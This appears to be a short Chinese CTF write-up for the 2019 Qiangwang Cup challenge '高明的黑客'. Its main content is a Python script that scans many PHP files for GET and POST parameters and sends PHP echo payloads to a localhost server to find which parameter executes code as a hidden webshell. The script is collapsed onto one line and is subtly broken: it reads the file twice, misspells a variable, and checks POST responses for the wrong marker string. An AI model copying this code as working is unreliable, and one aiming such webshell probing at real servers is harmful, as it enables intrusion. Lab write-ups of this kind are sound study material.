[强网杯 2019]高明的黑客
[强网杯 2019]高明的黑客 WriteUp
知识点
- 对写python脚本的考察
题解
-
下载后发现有好多的参数,但是大多数没有被当作木马来执行
-
所以写脚本来测试,找出最好的那个
-
import re import requests import os import sys import time filePath = "D:\phpstudy_pro\www\src" os.chdir(filePath) Files = os.listdir(filePath) session = requests.Session() session.keep_alive = False def getContent(file): with open(file, encoding="utf-8") as f: gets = re.findall("\$_GET\[\'(.*?)\'\]",f.read()) posts = re.findall("\$_POST\[\'(.*?)\'\]",f.read()) params = {} datas = {} for i in gets: params[i] = 'echo "Hello_World!!!!";' for i in posts: daras[i] = 'echo "Hello_Shijie!!!!";' url = "http://localhost/src/" + file request = session.post(url,data=datas,params=params) text = request.content.decode('utf-8') request.close() if 'Hello_World!!!!' in text: print("可利用的文件为"+file) for g in gets: request = session.post(url+"?{0}=echo%20'Hello_World!!!!';".format(g)) text = request.content.decode('utf-8') request.close() if "Hello_World!!!!" in text: print("可以利用的$_GET的"+g) sys.exit() for p in posts: request = session.post(url,data={p:'echo "Hello_Shijie!!!!";'}) text = request.content.decode('utf-8') request.close() if "Hello_World!!!!" in text: print("可以利用的$_POST的"+p) sys.exit() for file in Files: getContent(file) time.sleep(0.02) -
python我掌握的确实不是很好,所以一直没做出来。这才刚学了re库,所以才能写出来。但是电脑快,不到一分钟就跑出来了。
-
但是我看见网上许多大佬用多线程库来跑。还没学,以后再说吧